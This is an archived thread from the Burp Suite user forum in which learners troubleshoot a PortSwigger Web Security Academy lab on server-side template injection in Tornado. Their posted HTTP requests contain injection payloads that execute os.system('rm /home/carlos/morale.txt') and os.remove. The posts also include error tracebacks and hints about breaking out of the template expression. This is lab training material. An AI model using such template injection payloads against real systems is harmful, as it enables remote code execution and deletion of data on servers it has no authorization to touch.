Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Hey, I'm having an error when launching payload

a | Last updated: Apr 17, 2020 06:30PM UTC

The name of the challenge: Basic server-side template injection (code context) request 1 POST /my-account/change-blog-post-author-display HTTP/1.1 Host: <lab token>.web-security-academy.net Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://<lab token>.web-security-academy.net/my-account?id=wiener Content-Type: application/x-www-form-urlencoded Content-Length: 117 Connection: close Cookie: session=cookie Upgrade-Insecure-Requests: 1 blog-post-author-display={% import os%}{{os.system('rm /home/carlos/morale.txt')}}&csrf=token request 2 go to post add comment The payload will work in the name But when calling his office <example os > specifically, an error comes up No handlers could be found for logger "tornado.application" Traceback (most recent call last): File "<string>", line 15, in <module> File "/usr/lib/python2.7/dist-packages/tornado/template.py", line 317, in __init__ "exec", dont_inherit=True) File "<string>.generated.py", line 5 _tt_tmp = % import os%}{{os.system('rm /home/carlos/morale.txt') # <string>:1 ^ SyntaxError: invalid syntax | 17 April 2020 When some syntax is executed it works successfully like printing, reading files etc. And thanks in advance

a | Last updated: Apr 18, 2020 02:04PM UTC

The solution was done

Majid | Last updated: Apr 18, 2020 05:42PM UTC

Hi Stuck in the same situation for 3 hours. Any hint?

a | Last updated: Apr 19, 2020 12:03PM UTC

قم بأغلاق _tt_tmp = واضف الحموله

a | Last updated: Apr 19, 2020 12:03PM UTC

قم بأغلاق _tt_tmp = واضف الحموله

Michelle, PortSwigger Agent | Last updated: Apr 20, 2020 09:46AM UTC

We'll post the solutions when the first 10 users have solved all the new labs. In the meantime, keep trying and have fun!

Wade | Last updated: Apr 22, 2020 02:12PM UTC

same issue here. I tried basically the same payload except did: blog-post-author-display={%+import+os%}{{os.remove(/home/carlos/morale.txt)}}&csrf=token and a bunch of variants like {{import+os%3b+os.remove(/home/carlos/morale.txt}} _tt_tmp=payload works for 7*7 but not removing the file. offending lines here (https://github.com/tornadoweb/tornado/blob/master/tornado/template.py) seem to be 325-329. Thanks Michelle.

Peter | Last updated: Apr 23, 2020 02:12AM UTC